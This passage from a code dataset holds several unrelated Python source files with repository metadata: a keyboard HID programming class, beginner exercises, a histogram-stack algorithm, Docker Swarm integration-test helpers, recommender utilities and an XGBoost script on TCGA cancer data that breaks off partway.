* 100, digits) \n","repo_name":"Talic13th/SFlearning","sub_path":"SF/EDA_5/confidence_interval.py","file_name":"confidence_interval.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7375928143","text":"pessoas = []\ndado = []\nmaior = menor = 0\nwhile True:\n dado.append(str(input('Nome: ')))\n dado.append(float(input('Peso: ')))\n if len(pessoas) == 0:\n maior = menor = dado[1]\n else:\n if dado[1] > maior:\n maior = dado[1]\n if dado[1] < menor:\n menor = dado[1]\n pessoas.append(dado[:])\n dado.clear()\n continuar = ' '\n while continuar not in 'SN':\n continuar = str(input('Quer continuar? [S/N] ')).strip().upper()[0]\n if continuar in 'N':\n break\nprint(pessoas)\nprint(f'Ao todo, você cadastrou {len(pessoas)} pessoas.')\nprint(f'O maior peso foi {maior}Kg. Peso de ', end='')\nfor p in pessoas:\n if p[1] == maior:\n print(f'[{p[0]}]', end=' ')\nprint()\nprint(f'O menor peso foi {menor}Kg. 
Peso de ', end='')\nfor p in pessoas:\n if p[1] == menor:\n print(f'[{p[0]}]')\n","repo_name":"Rafael-Melo/CursoEmVideo","sub_path":"ex084_peso.py","file_name":"ex084_peso.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1528241978","text":"import logging\n\nimport hid\nimport usb.util\n\n\nclass Keyboard(object):\n # -- start commands\n # protocol \"alpha\"\n COMMAND_START = 0x00\n GET_PROTOCOL_VERSION = 0x01\n GET_KEYBOARD_VALUE = 0x02\n SET_KEYBOARD_VALUE = 0x03\n DYNAMIC_KEYMAP_GET_KEYCODE = 0x04\n DYNAMIC_KEYMAP_SET_KEYCODE = 0x05\n DYNAMIC_KEYMAP_CLEAR_ALL = 0x06\n BACKLIGHT_CONFIG_SET_VALUE = 0x07\n BACKLIGHT_CONFIG_GET_VALUE = 0x08\n BACKLIGHT_CONFIG_SAVE = 0x09\n EEPROM_RESET = 0x0a\n BOOTLOADER_JUMP = 0x0b\n\n # protocol \"beta\"\n DYNAMIC_KEYMAP_MACRO_GET_COUNT = 0x0c\n DYNAMIC_KEYMAP_MACRO_GET_BUFFER_SIZE = 0x0d\n DYNAMIC_KEYMAP_MACRO_GET_BUFFER = 0x0e\n DYNAMIC_KEYMAP_MACRO_SET_BUFFER = 0x0f\n DYNAMIC_KEYMAP_MACRO_RESET = 0x10\n DYNAMIC_KEYMAP_GET_LAYER_COUNT = 0x11\n DYNAMIC_KEYMAP_GET_BUFFER = 0x12\n DYNAMIC_KEYMAP_SET_BUFFER = 0x13\n # -- end commands\n\n # -- start backlight values ids\n # protocol \"alpha\"\n BACKLIGHT_USE_SPLIT_BACKSPACE = 0x01\n BACKLIGHT_USE_SPLIT_LEFT_SHIFT = 0x02\n BACKLIGHT_USE_SPLIT_RIGHT_SHIFT = 0x03\n BACKLIGHT_USE_7U_SPACEBAR = 0x04\n BACKLIGHT_USE_ISO_ENTER = 0x05\n BACKLIGHT_DISABLE_HHKB_BLOCKER_LEDS = 0x06\n BACKLIGHT_DISABLE_WHEN_USB_SUSPENDED = 0x07\n BACKLIGHT_DISABLE_AFTER_TIMEOUT = 0x08\n BACKLIGHT_BRIGHTNESS = 0x09\n BACKLIGHT_EFFECT = 0x0a\n BACKLIGHT_EFFECT_SPEED = 0x0b\n BACKLIGHT_COLOR_1 = 0x0c\n BACKLIGHT_COLOR_2 = 0x0d\n BACKLIGHT_CAPS_LOCK_INDICATOR_COLOR = 0x0e\n BACKLIGHT_CAPS_LOCK_INDICATOR_ROW_Col = 0x0f\n BACKLIGHT_LAYER_1_INDICATOR_COLOR = 0x10\n BACKLIGHT_LAYER_1_INDICATOR_ROW_COL = 0x11\n BACKLIGHT_LAYER_2_INDICATOR_COLOR = 0x12\n BACKLIGHT_LAYER_2_INDICATOR_ROW_COL = 0x13\n BACKLIGHT_LAYER_3_INDICATOR_COLOR = 0x14\n BACKLIGHT_LAYER_3_INDICATOR_ROW_COL = 0x15\n BACKLIGHT_ALPHAS_MODS = 0x16\n\n # protocol \"beta\"\n BACKLIGHT_CUSTOM_COLOR = 0x17\n # -- end backlight values ids\n\n PROTOCOLS = {\n 7: 'alpha',\n 8: 'beta',\n 9: 'gamma'\n }\n\n BL_PROTOCOLS = {\n 0: 'none',\n 1: 'wilba'\n }\n\n def __init__(self, device, name, tag, rows, cols, use_hid, **kwargs):\n self.name = name\n self.tag = tag\n self.rows = rows\n self.cols = cols\n\n self.logger = logging.getLogger(__name__)\n\n self._layers = None\n self._macro_buffer_size = None\n self._macro_count = None\n self.macros = []\n\n self.use_hid = use_hid\n self.device = device\n\n if not self.use_hid:\n self.find_endpoint()\n\n if self.device.is_kernel_driver_active(self.interface):\n self.device.detach_kernel_driver(self.interface)\n\n try:\n usb.util.claim_interface(self.device, self.interface)\n self.logger.info('Claimed device')\n except Exception as e:\n self.logger.debug('Could not claim device: %s',\n str(e))\n else:\n self.find_hidpath()\n\n self.protocol = self.get_protocol()\n self._load_macros()\n\n def dump(self):\n self.logger.info('Name: %s', self.name)\n self.logger.info('Wiring: %sx%s', self.cols, self.rows)\n\n protocol = self.PROTOCOLS.get(self.protocol,\n 'Unknown: %d' % self.protocol)\n self.logger.info('Protocol: %s', protocol)\n self.logger.info('Layers: %s', self.layers)\n self.logger.info('Macros: %s', self.macro_count)\n if self.macro_count:\n self.logger.info('Macro buffer size: %s', self.macro_bytes)\n for idx, macro in 
enumerate(self.macros):\n self.logger.info('Macro %d: %s', idx, macro)\n\n def get_protocol(self):\n result = self._send_command(self.GET_PROTOCOL_VERSION)\n retval = (result[1] * 256) + result[2]\n return retval\n\n def bootloader(self):\n self._send_command(self.BOOTLOADER_JUMP)\n\n def save(self):\n self._send_command(self.BACKLIGHT_CONFIG_SAVE)\n\n @property\n def layers(self):\n if self._layers is None:\n if self.protocol == 7:\n self._layers = 3\n result = self._send_command(self.DYNAMIC_KEYMAP_GET_LAYER_COUNT)\n self._layers = result[1]\n return self._layers\n\n @property\n def macro_bytes(self):\n if self.protocol == 7:\n self._macro_buffer_size = 0\n else:\n result = self._send_command(\n self.DYNAMIC_KEYMAP_MACRO_GET_BUFFER_SIZE)\n self._macro_buffer_size = result[1] << 8 | result[2]\n return self._macro_buffer_size\n\n @property\n def macro_count(self):\n if self.protocol == 7:\n self._macro_count = 0\n else:\n result = self._send_command(self.DYNAMIC_KEYMAP_MACRO_GET_COUNT)\n self._macro_count = result[1]\n return self._macro_count\n\n def set_macro(self, index, value):\n if index > self.macro_count:\n raise RuntimeError('Macro %d out of range' % index)\n\n value = bytes(value, 'latin1').decode('unicode_escape')\n self.macros[index] = value\n\n def _load_macros(self):\n if self.macro_count == 0:\n return\n\n macro_bytes = self.macro_bytes\n if not macro_bytes:\n return\n\n buffer = bytearray()\n left_to_read = macro_bytes\n offset = 0\n\n while(left_to_read):\n to_read = min(left_to_read, 28)\n next = self._send_command(\n self.DYNAMIC_KEYMAP_MACRO_GET_BUFFER,\n (offset & 0xFF00) >> 8,\n offset & 0xFF,\n to_read & 0xFF)\n\n data = next[4:4+to_read]\n buffer += data\n left_to_read -= to_read\n offset += to_read\n\n macro = 0\n current_macro = bytearray()\n offset = 0\n\n while(macro < self.macro_count):\n if buffer[offset] != 0:\n current_macro.append(buffer[offset])\n else:\n self.logger.debug('Macro %d: %s', macro, current_macro)\n self.macros.append(current_macro.decode('latin1'))\n current_macro = bytearray()\n macro += 1\n\n offset += 1\n\n def save_macros(self):\n macro_bytes = self.macro_bytes\n if not macro_bytes:\n return\n\n buffer = bytearray()\n for macro in range(self.macro_count):\n buffer += bytearray(self.macros[macro].encode('latin1'))\n buffer.append(0)\n\n if len(buffer) > self.macro_bytes:\n raise RuntimeError('macro too large')\n\n left_to_write = len(buffer)\n offset = 0\n\n while(left_to_write):\n to_write = min(left_to_write, 28)\n self._send_command(\n self.DYNAMIC_KEYMAP_MACRO_SET_BUFFER,\n (offset & 0xFF00) >> 8,\n offset & 0xFF,\n to_write & 0xFF,\n buffer[offset:offset+to_write])\n\n left_to_write -= to_write\n offset += to_write\n\n def set_key(self, layer, row, col, value):\n self._send_command(\n self.DYNAMIC_KEYMAP_SET_KEYCODE,\n layer, row, col, (value & 0xFF00) >> 8, value & 0xFF)\n\n def keyboard_map_beta(self, callback=None):\n buffer = bytearray()\n\n buffer_size = self.layers * self.rows * self.cols * 2\n left_to_read = buffer_size\n offset = 0\n\n while(left_to_read):\n to_read = min(left_to_read, 28)\n next = self._send_command(\n self.DYNAMIC_KEYMAP_GET_BUFFER,\n (offset & 0xFF00) >> 8,\n offset & 0xFF,\n to_read & 0xFF)\n\n data = next[4:4+to_read]\n buffer += data\n left_to_read -= to_read\n offset += to_read\n\n if callback is not None:\n read = buffer_size - left_to_read\n percent = float(read) / float(buffer_size)\n callback(percent)\n\n self.logger.debug('Map: %s bytes (expected %s): %s',\n len(buffer),\n self.layers * self.rows * 
self.cols * 2,\n ' '.join('%02x' % x for x in buffer))\n\n # now, split it out\n items = []\n pos = 0\n for layer in range(self.layers):\n items.append([])\n for row in range(self.rows):\n items[layer].append([])\n for col in range(self.cols):\n items[layer][row].append(\n buffer[pos] << 8 | buffer[pos+1])\n pos += 2\n\n return items\n\n def keyboard_map(self, callback=None):\n if self.protocol > 7: # beta or better\n return self.keyboard_map_beta(callback=callback)\n\n items = []\n\n total_items = self.layers * self.rows * self.cols\n read = 0\n\n for layer in range(self.layers):\n items.append([])\n\n for row in range(self.rows):\n items[layer].append([])\n self.logger.debug('Reading layer %d, row %d' % (layer, row))\n\n for col in range(self.cols):\n result = self._send_command(\n self.DYNAMIC_KEYMAP_GET_KEYCODE,\n layer, row, col)\n items[layer][row].append(result[4] * 256 + result[5])\n read += 1\n\n if callback is not None:\n percent = float(read) / float(total_items)\n callback(percent)\n\n return items\n\n @property\n def effect(self):\n result = self._send_command(self.BACKLIGHT_CONFIG_GET_VALUE,\n self.BACKLIGHT_EFFECT, 0x00)\n return result[2]\n\n @effect.setter\n def effect(self, value):\n self._send_command(self.BACKLIGHT_CONFIG_SET_VALUE,\n self.BACKLIGHT_EFFECT, value)\n\n def _send_command(self, *args):\n bufsize = 32\n out_buf = [0x00] * bufsize\n ofs = 0\n\n for item in args:\n if isinstance(item, int):\n out_buf[ofs] = item\n ofs += 1\n elif isinstance(item, str):\n for char in item:\n out_buf[ofs] = ord(char)\n ofs += 1\n elif isinstance(item, bytearray):\n for char in item:\n out_buf[ofs] = char\n ofs += 1\n else:\n raise RuntimeError('bad cmd')\n\n out_buf = (''.join([chr(x) for x in out_buf])).encode('latin1')\n if len(out_buf) != 32:\n raise RuntimeError('Buffer too big!')\n\n self.logger.debug('Send: %d bytes: %s',\n len(out_buf),\n ' '.join('%02x' % x for x in out_buf))\n\n if not self.use_hid:\n result = self.device.write(self.out_ep, out_buf, timeout=1000)\n\n retry_count = 0\n while retry_count <= 1:\n if self.use_hid:\n result = self.hid_device.write(out_buf)\n in_buf = self.hid_device.read(32, 300) # 1s timeout\n else:\n in_buf = self.device.read(self.in_ep, 32, timeout=1000)\n\n if len(in_buf) != 0:\n break\n retry_count += 1\n # self.logger.info(f'Bad read: {len(in_buf)} bytes... 
retrying...')\n\n self.logger.debug('Recv: %s bytes: %s',\n len(in_buf),\n ' '.join('%02x' % x for x in in_buf))\n return in_buf\n\n def find_hidpath(self):\n self.logger.info(f'Probing for raw hid device among {self.device}')\n for item in self.device:\n self.hid_device = hid.Device(path=item)\n try:\n buf = self._send_command(self.GET_PROTOCOL_VERSION)\n pver = buf[1] * 256 + buf[2]\n except Exception:\n self.logger.info(f'Timeout for {item}')\n self.hid_device.close()\n continue\n\n if pver not in self.PROTOCOLS:\n self.logger.info(f'Invalid protocol: {pver}')\n else:\n self.logger.info(f'Using path {item}')\n return\n\n raise RuntimeError('Cannot find suitable hid device')\n\n def find_endpoint(self):\n self.logger.debug('Probing for endpoint')\n\n cfg = self.device.get_active_configuration()\n\n for intf in cfg:\n self.logger.debug('Iface %s', intf.bInterfaceNumber)\n\n ep_addrs = []\n\n for ep in intf:\n ep_addrs.append(ep.bEndpointAddress)\n self.logger.debug(' %s', ep.bEndpointAddress)\n\n if len(ep_addrs) == 2:\n ep1 = ep_addrs[0]\n ep2 = ep_addrs[1]\n\n self.out_ep = ep1 if ep1 < 0x7f else ep2\n self.in_ep = ep2 if self.out_ep == ep1 else ep1\n self.interface = intf.bInterfaceNumber\n\n self.logger.info('Using interface %d: in %d/out %d',\n self.interface, self.in_ep, self.out_ep)\n break\n\n if not self.interface:\n raise RuntimeError('No good interface found')\n","repo_name":"rpedde/kb_prog","sub_path":"kbprog/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":13324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14539274481","text":"#Алхасова Разият Запировна \n#Вариант №2\nimport random \nprint ('Программа случайным образом отображает название одного из трех поросят ')\npigs = [\n 'nif',\n 'nuf',\n 'naf']\nprint (random.choice(pigs)) \ninput (' Нажмите Enter для выхода')","repo_name":"jusssasha/test","sub_path":"inb/Alkhasova/ARlab5.py","file_name":"ARlab5.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9945122858","text":"from stacks.stack import Stack\n\ntp = None\nstk = Stack()\nx = list(map(int, input().split(' ')))\nn = len(x)\ni = 0\nmaxi = 0\nwhile (i < n):\n if stk.is_empty() or x[stk.peek()] <= x[i]:\n stk.push(i)\n i += 1\n\n else:\n tp = stk.peek()\n stk.pop()\n if stk.is_empty():\n temp = x[tp] * i\n else:\n temp = x[tp] * (i - stk.peek() - 1)\n if maxi < temp:\n maxi = temp\nwhile not stk.is_empty():\n tp = stk.peek()\n stk.pop()\n if stk.is_empty():\n temp = x[tp] * i\n else:\n\n temp = x[tp] * (i - stk.peek() - 1)\n if maxi < temp:\n print(maxi)\n maxi = temp\n\nprint(maxi)\n","repo_name":"thepavankoushik/pure-python","sub_path":"stacks/largest_rect_area_hist.py","file_name":"largest_rect_area_hist.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3102922401","text":"import asyncio\nimport os\nimport shutil\nimport socket\nimport subprocess\nimport uuid\nfrom aiohttp.test_utils import (\n AioHTTPTestCase, TestClient, TestServer, setup_test_loop,\n unittest_run_loop)\nfrom aiosparql.client import SPARQLClient\nfrom aiosparql.syntax import escape_any, IRI, Node, RDF, Triples\nfrom copy import copy\nfrom os import environ as ENV\nfrom textwrap import dedent\nfrom yarl import URL\n\nimport muswarmadmin.delta\nimport muswarmadmin.main\nfrom muswarmadmin.actionscheduler 
import ActionScheduler\nfrom muswarmadmin.prefixes import Dct, Doap, Mu, Stackbuilder, SwarmUI\n\n__all__ = ['IntegrationTestCase', 'unittest_run_loop']\n\n\n_sentinel = object()\n\n\n# NOTE: temporary fix: ensure a child watcher is set before running test\ndef setup_test_loop(loop_factory=asyncio.new_event_loop): # noqa\n \"\"\"Create and return an asyncio.BaseEventLoop\n instance.\n\n The caller should also call teardown_test_loop,\n once they are done with the loop.\n \"\"\"\n loop = loop_factory()\n asyncio.set_event_loop(None)\n policy = asyncio.get_event_loop_policy()\n watcher = asyncio.SafeChildWatcher()\n watcher.attach_loop(loop)\n policy.set_child_watcher(watcher)\n return loop\n\n\nclass FixedPortTestServer(TestServer):\n @asyncio.coroutine\n def start_server(self, loop=None, **kwargs):\n if self.server:\n return\n self._loop = loop\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._socket.bind((\"0.0.0.0\", 80))\n self.port = self._socket.getsockname()[1]\n self._ssl = None\n self.scheme = 'http'\n self._root = URL('{}://{}:{}'.format(self.scheme,\n self.host,\n self.port))\n\n handler = yield from self._make_factory(**kwargs)\n self.server = yield from self._loop.create_server(\n handler, ssl=self._ssl, sock=self._socket)\n\n # NOTE: temporary fix: ensure that the event loop is set in the app before\n # firing on_startup\n @asyncio.coroutine\n def _make_factory(self, **kwargs):\n self.app._set_loop(self._loop) # here\n yield from self.app.startup()\n self.handler = self.app.make_handler(loop=self._loop, **kwargs)\n return self.handler\n\n\nclass IntegrationTestCase(AioHTTPTestCase):\n example_repo = \\\n \"https://github.com/big-data-europe/mu-swarm-ui-testing.git\"\n sparql_timeout = 5\n\n async def get_application(self):\n app = copy(muswarmadmin.main.app)\n app.sparql_timeout = self.sparql_timeout\n return app\n\n async def scheduler_complete(self, key):\n if key not in ActionScheduler.executers:\n raise KeyError(\n \"ActionScheduler for key %s does not exist. 
\"\n \"HINT: the ActionScheduler is removed automatically after \"\n \"calling this function\" % key)\n await ActionScheduler.executers[key].cancel()\n\n async def wait_scheduler(self, key, timeout=3):\n for i in range(timeout * 5):\n if key in ActionScheduler.executers:\n break\n await asyncio.sleep(0.2)\n await self.scheduler_complete(key)\n\n def uuid4(self):\n return str(uuid.uuid4()).replace(\"-\", \"\").upper()\n\n def resource(self, type_, id):\n return (\n muswarmadmin.main.Application.base_resource + \"%s/%s\" % (type_, id)\n )\n\n def project_exists(self, project_name):\n return os.path.exists(\"/data/%s\" % project_name)\n\n async def triple_exists(self, s=None, p=None, o=None):\n s = escape_any(s) if s is not None else \"?s\"\n p = escape_any(p) if p is not None else \"?p\"\n o = escape_any(o) if o is not None else \"?o\"\n result = await self.app.sparql.query(\n \"ASK FROM {{graph}} WHERE { {{}} {{}} {{}} }\", s, p, o)\n return result['boolean']\n\n async def prepare_triples(self, triples):\n await self.db.update(\n \"INSERT DATA { GRAPH {{graph}} { {{}} } }\", Triples(triples))\n\n async def insert_triples(self, triples):\n await self.app.sparql.update(\n \"INSERT DATA { GRAPH {{graph}} { {{}} } }\", Triples(triples))\n\n async def prepare_node(self, node):\n await self.prepare_triples([node])\n\n async def insert_node(self, node):\n await self.insert_triples([node])\n\n async def remove_triples(self, s=None, p=None, o=None):\n s = escape_any(s) if s is not None else \"?s\"\n p = escape_any(p) if p is not None else \"?p\"\n o = escape_any(o) if o is not None else \"?o\"\n await self.app.sparql.update(\n \"\"\"\n WITH {{graph}}\n DELETE {\n {{s}} {{p}} {{o}}\n }\n WHERE {\n {{s}} {{p}} {{o}}\n }\"\"\", s=s, p=p, o=o)\n\n async def describe(self, subject):\n return await self.app.sparql.query(\"DESCRIBE {{}} FROM {{graph}}\",\n subject)\n\n async def create_drc_node(self, repository_iri=_sentinel,\n location=_sentinel):\n if repository_iri is _sentinel:\n repository_iri, repository_id = \\\n await self.create_repository(location=location)\n else:\n s_repository_iri = str(repository_iri)\n repository_id = s_repository_iri.split('/')[-1][:-1]\n drc_text = dedent(\"\"\"\\\n version: \"2\"\n services:\n service1:\n image: busybox\n command: \"sleep 60\"\n service2:\n image: busybox\n command: \"sleep 60\"\n \"\"\")\n drc_id = self.uuid4()\n d_iri = IRI(\"http://stack-builder.big-data-europe.eu/resources/\")\n drc_iri = d_iri + \"%s/%s\" % (\"docker-composes\", drc_id)\n drc_title = \"stack_{}_drc_{}\".format(repository_id, drc_id)\n drc_node = Node(drc_iri, {\n RDF.type: Stackbuilder.DockerCompose,\n Mu.uuid: drc_id,\n Dct.title: drc_title,\n Stackbuilder.text: drc_text\n })\n\n await self.insert_triples([\n drc_node,\n (repository_iri, SwarmUI.dockerComposeFile, drc_node),\n ])\n return (drc_iri, drc_id)\n\n async def create_repository(self, location=_sentinel):\n if location is _sentinel:\n location = self.example_repo\n repository_id = self.uuid4()\n repository_iri = self.resource(\"stacks\", repository_id)\n await self.insert_node(Node(repository_iri, {\n RDF.type: Doap.Stack,\n Mu.uuid: repository_id,\n Doap.location: location,\n }))\n return (repository_iri, repository_id)\n\n async def create_pipeline(self, repository_iri=_sentinel,\n location=_sentinel):\n if repository_iri is _sentinel:\n repository_iri, repository_id = \\\n await self.create_repository(location=location)\n pipeline_id = self.uuid4()\n pipeline_iri = self.resource(\"pipeline-instances\", pipeline_id)\n 
pipeline_node = Node(pipeline_iri, {\n RDF.type: SwarmUI.Pipeline,\n Mu.uuid: pipeline_id,\n })\n await self.insert_triples([\n pipeline_node,\n (repository_iri, SwarmUI.pipelines, pipeline_node),\n ])\n await self.scheduler_complete(pipeline_id)\n return (pipeline_iri, pipeline_id)\n\n async def get_services(self, project_name):\n result = await self.app.sparql.query(\n \"\"\"\n SELECT ?name ?service ?uuid\n FROM {{graph}}\n WHERE {\n ?pipeline mu:uuid {{}} ;\n swarmui:services ?service .\n\n ?service mu:uuid ?uuid ;\n dct:title ?name .\n }\n \"\"\", escape_any(project_name))\n return {\n x['name']['value']: (IRI(x['service']['value']),\n x['uuid']['value'])\n for x in result['results']['bindings']\n }\n\n async def prepare_database(self):\n await self.db.update(\"CLEAR GRAPH {{graph}}\")\n\n def setUp(self):\n self.loop = setup_test_loop()\n\n self.db = SPARQLClient(endpoint=\"http://database:8890/sparql\",\n graph=IRI(ENV['MU_APPLICATION_GRAPH']),\n loop=self.loop,\n read_timeout=self.sparql_timeout)\n self.loop.run_until_complete(self.prepare_database())\n\n self.app = self.loop.run_until_complete(self.get_application())\n\n self.server = FixedPortTestServer(self.app)\n self.client = self.loop.run_until_complete(\n self._get_client(self.server))\n\n self.loop.run_until_complete(self.client.start_server())\n\n def tearDown(self):\n self.loop.run_until_complete(self.db.close())\n super().tearDown()\n for project_name in os.listdir(\"/data\"):\n project_path = \"/data/%s\" % project_name\n subprocess.call([\"docker-compose\", \"down\"], cwd=project_path)\n shutil.rmtree(project_path)\n\n # NOTE: temporary fix, will be fixed with the next aiohttp release\n @asyncio.coroutine\n def _get_client(self, app):\n \"\"\"Return a TestClient instance.\"\"\"\n return TestClient(app, loop=self.loop)\n\n async def assertNode(self, subject, values):\n result = await self.describe(subject)\n self.assertTrue(result and result[subject])\n for p, o in values.items():\n found_values = [x['value'] for x in result[subject][p]]\n self.assertEqual(\n len(found_values), 1,\n \"multiple predicates {} in node's subject {}: {!r}\".format(\n p, subject, found_values))\n self.assertEqual(\n found_values[0], o,\n \"predicate {} in node {} has value {}, expected {}\".format(\n p, subject, found_values[0], o))\n\n async def assertStatus(self, subject, status):\n await self.assertNode(subject, {SwarmUI.status: status})\n\n async def assertExists(self, s=None, p=None, o=None):\n self.assertTrue(await self.triple_exists(s, p, o))\n\n async def assertNotExists(self, s=None, p=None, o=None):\n self.assertFalse(await self.triple_exists(s, p, o))\n","repo_name":"big-data-europe/mu-swarm-admin-service","sub_path":"tests/integration/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":10448,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"12843589946","text":"import numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom load_config import get_attribute\r\n\r\n\r\nclass WeightMSELoss(nn.Module):\r\n\r\n def __init__(self, weights=None):\r\n super(WeightMSELoss, self).__init__()\r\n self.weights = weights\r\n if weights is not None:\r\n self.weights = torch.sqrt(torch.tensor(weights))\r\n self.mse_loss = nn.MSELoss(reduction='sum')\r\n\r\n def forward(self, truth, predict):\r\n # predict = torch.softmax(predict, dim=-1)\r\n # predict = torch.sigmoid(predict)\r\n truth = truth.float()\r\n if self.weights is not 
None:\r\n self.weights = self.weights.to(truth.device)\r\n predict = predict * self.weights\r\n truth = truth * self.weights\r\n\r\n loss = self.mse_loss(predict, truth)\r\n # loss = loss.requires_grad_()\r\n return loss\r\n\r\n\r\ndef get_attn_pad_mask(seq_q, seq_k): #把pad与正常的词区分开\r\n\r\n batch_size, len_q = seq_q.size()\r\n batch_size, len_k = seq_k.size()\r\n\r\n pad_attn_mask = seq_k.data.eq(0).unsqueeze(1) \r\n return pad_attn_mask.expand(batch_size, len_q, len_k) \r\n\r\ndef get_item_pad_mask(seq_q, seq_k):\r\n\r\n batch_size, qbasket_num, qitem_num = seq_q.size()\r\n batch_size, kbasket_num, kitem_num = seq_k.size()\r\n pad_mask = seq_k.data.eq(0).unsqueeze(2)\r\n return pad_mask.expand(batch_size, qbasket_num, qitem_num, kitem_num)\r\n\r\n\r\n\r\n\r\ndef get_attn_subsequence_mask(seq):\r\n\r\n attn_shape = [seq.size(0), seq.size(1), seq.size(1)]\r\n subsequence_mask = np.triu(np.ones(attn_shape), k=1) \r\n subsequence_mask = torch.from_numpy(subsequence_mask).byte()\r\n return subsequence_mask \r\n\r\n\r\ndef save_model(model, model_path):\r\n torch.save(model.state_dict(), model_path)\r\n\r\n\r\ndef get_txt_mask(txt_data, user_data):\r\n user_txts = []\r\n user_txt_masks = []\r\n for user in user_data:\r\n txt = torch.tensor(txt_data[user[4:]][0])\r\n mask = torch.tensor(()).new_ones(len(txt))\r\n mask = txt * mask\r\n for idx, x in enumerate(mask):\r\n if x > 0:\r\n mask[idx] = 1\r\n user_txts.append(txt)\r\n user_txt_masks.append(mask)\r\n user_txts = torch.stack(user_txts)\r\n user_txt_masks = torch.stack(user_txt_masks)\r\n return user_txts, user_txt_masks.unsqueeze(2)\r\n\r\n\r\ndef get_truth_data(truth_data):\r\n truth_list = []\r\n for basket in truth_data:\r\n one_hot_items = F.one_hot(basket, num_classes=get_attribute(\"items_total\"))\r\n one_hot_basket, _ = torch.max(one_hot_items, dim=-2)\r\n truth_list.append(one_hot_basket)\r\n truth = torch.stack(truth_list)\r\n return truth\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"paopaoofyjz/NDMARec","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36616222763","text":"\"\"\"\nauthor : Franklin Gallardo\ndate : 09-Jul-2021\n\"\"\"\nimport time\nfrom datetime import datetime\n\nTIME_WAIT = 5 # seconds time\n\n\n# process time\ndef format_readable_date():\n date_begin = datetime.now() # start process\n time.sleep(TIME_WAIT) # wait\n date_end = datetime.now() # end process\n date_process = date_end - date_begin # timedelta object\n print(hour_min_sec_micro(date_process))\n\n\n# format human\ndef hour_min_sec_micro(delta):\n hours, remainder = divmod(delta.seconds, 3600) # hours\n minutes, seconds = divmod(remainder, 60) # minutes and seconds\n return '({:02})hours:({:02})minutes:({:02})seconds ({:06})micro' \\\n .format(int(hours), int(minutes), int(seconds), int(delta.microseconds))\n\n\n# main method.\nif __name__ == '__main__':\n format_readable_date()\n","repo_name":"fgallard23/formatreadable","sub_path":"format_human_date.py","file_name":"format_human_date.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5395337716","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 10 16:30:48 2019\n\n@author: adityavyas\n\"\"\"\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as 
plt\nimport pandas as pd\nimport random\nimport pickle\n\ndef get_dataset():\n \n # Importing the dataset\n dataset = pd.read_csv('data/TCGA_data.csv')\n \n #DATA Cleaning\n dataset= dataset.drop(columns=\"Unnamed: 0\") #CLEANING\n dataset= dataset.drop(columns=\"sample_barcode\") #CLEANING\n \n dataset.dropna(subset=['project_name'], how='all', inplace = True)\n \n dataset.drop(dataset.loc[dataset['gender']==\"MALE\"].index, inplace=True)\n \n dataset[\"project_name\"] = np.where(dataset[\"project_name\"]==\"TCGA-BRCA\",1,0)\n return dataset\n\n# dataset[\"project_name\"].describe()\n\ndef divide(dataset):\n #Dividing the dataset\n X = dataset.iloc[:, 2:]\n y = dataset.iloc[:, 0]\n \n # Splitting the dataset into the Training set and Test set\n from sklearn.model_selection import train_test_split\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n \n return [X_train, X_test, y_train, y_test]\n\n\ndef run_xgboost(X_train,y_train,X_test,y_test):\n # Fitting XGBoost to the Training set\n from xgboost import XGBClassifier\n classifier = XGBClassifier()\n classifier.fit(X_train, y_train)\n \n # Predicting the Test set results\n y_pred = classifier.predict(X_test)\n \n# # Making the Confusion Matrix\n# from sklearn.metrics import confusion_matrix\n# cm = confusion_matrix(y_test, y_pred)\n \n # Applying k-Fold Cross Validation\n from sklearn.model_selection import cross_val_score\n accuracies = cross_val_score(estimator = classifier, X = X_train, y = y_train, cv = 10)\n# accuracies.mean()\n# accuracies.std()\n \n \n import sklearn.metrics as metrics\n # calculate the fpr and tpr for all thresholds of the classification\n probs = classifier.predict_proba(X_test)\n preds = probs[:,1]\n fpr, tpr, threshold = metrics.roc_curve(y_test, preds)\n roc_auc = metrics.auc(fpr, tpr)\n \n# # method I: plt\n# import matplotlib.pyplot as plt\n# plt.title('Receiver Operating Characteristic')\n# plt.plot(fpr, tpr, 'b', label = 'AUC = %0.3f' % roc_auc)\n# plt.legend(loc = 'lower right')\n# plt.plot([0, 1], [0, 1],'r--')\n# plt.xlim([0, 1])\n# plt.ylim([0, 1])\n# plt.ylabel('True Positive Rate')\n# plt.xlabel('False Positive Rate')\n# plt.show()\n \n return {\"accuracy\":accuracies.mean(),\"std\":accuracies.std(),\"AUC\":roc_auc}\n \n#FROM ITERATION 3 \ndef add_gaussian_index(df,index):\n import math\n mean= df.mean()[index]\n std = df.std()[index]\n var = std**2\n denom = var*((2**math.pi)**0.5)\n new = df.iloc[:,index]\n new = new.fillna(0)\n\n 